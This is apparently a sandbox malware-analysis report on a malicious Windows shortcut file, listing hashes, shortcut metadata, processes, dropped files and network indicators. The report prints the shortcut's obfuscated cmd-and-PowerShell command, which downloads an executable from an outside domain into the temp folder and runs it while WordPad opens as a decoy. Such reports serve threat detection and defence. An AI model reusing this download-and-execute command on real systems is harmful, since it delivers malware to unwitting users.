analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | GFHN-939742232.lnk |
| Full analysis: | https://app.any.run/tasks/43651b2e-ed57-42d3-a3eb-8ac520326518 |
| Verdict: | Malicious activity |
| Analysis date: | May 20, 2019, 19:59:43 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MIME: | application/octet-stream |
| File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Sat Jul 16 10:42:36 2016, mtime=Sat Jul 16 10:42:36 2016, atime=Sat Jul 16 10:42:36 2016, length=232960, window=hidenormalshowminimized |
| MD5: | 9BAD694D593879A00DF53FD56F19B148 |
| SHA1: | A3AEA6F33319635415067FBE21D8315EABC7AE16 |
| SHA256: | 48F4BB740035BA18CE1956FE962ED1F1EBFD844A4D50C1A4A9FD73F8302314DB |
| SSDEEP: | 6144:uEOHhf5h0S4rJj4tgaIertRaUPuyBp8vgJ2:vOHhfv0SKj4iaXrtR9GyBp8oQ |
MALICIOUS
Executes PowerShell scripts
- cmd.exe (PID: 1244)
SUSPICIOUS
Creates files in the user directory
- powershell.exe (PID: 2880)
Executable content was dropped or overwritten
- powershell.exe (PID: 2880)
INFO
No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .lnk | | | Windows Shortcut (100) |
|---|
EXIF
LNK
| Flags: | IDList, LinkInfo, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode, ExpString, ExpIcon, TargetMetadata |
|---|---|
| FileAttributes: | Archive |
| CreateDate: | 2016:07:16 13:42:36+02:00 |
| AccessDate: | 2016:07:16 13:42:36+02:00 |
| ModifyDate: | 2016:07:16 13:42:36+02:00 |
| TargetFileSize: | 232960 |
| IconIndex: | (none) |
| RunWindow: | Show Minimized No Activate |
| HotKey: | (none) |
| TargetFileDOSName: | cmd.exe |
| DriveType: | Fixed Disk |
| VolumeLabel: | New1 |
| LocalBasePath: | C:\Windows\System32\cmd.exe |
| Description: | qqqqqqqqqqq1qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq |
| RelativePath: | ..\..\..\Windows\System32\cmd.exe |
| WorkingDirectory: | C:\Windows\system32 |
| CommandLineArguments: | /C set o=HttPs:/&powershEll "$sd=new-object system.nEt.weBcliEnt;$sd.doWnloAdfIle($env:o+'/www.braintrainersuk.com/ONOLTDA-GD.exe',$env:tmp+'\D.exe');"&"%programfiles%\wiNDows nt\accESsorIes\wORdpaD" c:\pagefIle.syS&%tmp%/d&J34HH&E34JSH_d+&df |
| IconFileName: | C:\Windows\notepad.exe |
| MachineID: | genisys |
| FillAttributes: | 0xff |
| PopupFillAttributes: | 0xff |
| ScreenBufferSize: | 2 x 9002 |
| WindowSize: | 2 x 2 |
| WindowOrigin: | 2 x 3 |
| FontSize: | 0 x 5 |
| FontFamily: | Unknown (0x36) |
| FontWeight: | 400 |
| FontName: | Lucida Console |
| CursorSize: | 50 |
| FullScreen: | No |
| QuickEdit: | Yes |
| InsertMode: | Yes |
| WindowOriginAuto: | No |
| HistoryBufferSize: | 51 |
| NumHistoryBuffers: | 5 |
| RemoveHistoryDuplicates: | No |
Total processes
35
Monitored processes
3
Malicious processes
1
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 1244 | "C:\Windows\System32\cmd.exe" /C set o=HttPs:/&powershEll "$sd=new-object system.nEt.weBcliEnt;$sd.doWnloAdfIle($env:o+'/www.braintrainersuk.com/ONOLTDA-GD.exe',$env:tmp+'\D.exe');"&"C:\Program Files\wiNDows nt\accESsorIes\wORdpaD" c:\pagefIle.syS&C:\Users\admin\AppData\Local\Temp/d&J34HH&E34JSH_d+&df | C:\Windows\System32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
| 2880 | powershEll "$sd=new-object system.nEt.weBcliEnt;$sd.doWnloAdfIle($env:o+'/www.braintrainersuk.com/ONOLTDA-GD.exe',$env:tmp+'\D.exe');" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
| 2840 | "C:\Program Files\wiNDows nt\accESsorIes\wORdpaD" c:\pagefIle.syS | C:\Program Files\wiNDows nt\accESsorIes\wordpad.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Wordpad Application Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
Total events
250
Read events
170
Write events
0
Delete events
0
Modification events
Executable files
1
Suspicious files
2
Text files
0
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2880 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B9U22TO1981UQ5HB6ZC1.temp | — | |
MD5:— | SHA256:— | |||
| 2880 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11fe14.TMP | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
| 2880 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
| 2880 | powershell.exe | C:\Users\admin\AppData\Local\Temp\D.exe | executable | |
MD5:E6DBE5E47DAB3B586A10F9B2BFD4312A | SHA256:A742DD1829BF43E23262D378D8E5219C5C9DA60C28BBC3C063274AAD4B961171 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0
HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2880 | powershell.exe | 68.66.248.28:443 | www.braintrainersuk.com | A2 Hosting, Inc. | US | suspicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
www.braintrainersuk.com |
| malicious |